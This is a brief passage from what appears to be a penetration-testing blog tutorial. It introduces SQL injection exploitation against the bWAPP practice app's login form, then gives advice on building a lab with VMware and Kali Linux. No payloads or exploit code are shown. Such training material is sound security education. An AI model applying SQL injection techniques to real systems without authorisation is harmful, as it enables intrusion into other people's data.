As you already familiar with the subject SQL injections from the previous article part 1, we will quickly dive into exploitation with SQLi. Login to your bWAPP and select vulnerability SQL Injection (Login Form/Hero). As stated in previous post, we need to do some manual analysis to know the functionality and it’s implementation. Try to login with your some random text (test, test). Now let’s do some dynamic analysis by reviewing source code of the functionality.
To excel at penetration testing, you need to have your lab for practise/research. I would suggest one to use virtual machines which are free in the market. I would go with VMware Workstation rather than Virtual box, it’s just my personal option. You can choose any one.
1. VMware Workstation
Click here to download VMware Workstation
2. Kali Linux iso
Click here to download Kali Linux Iso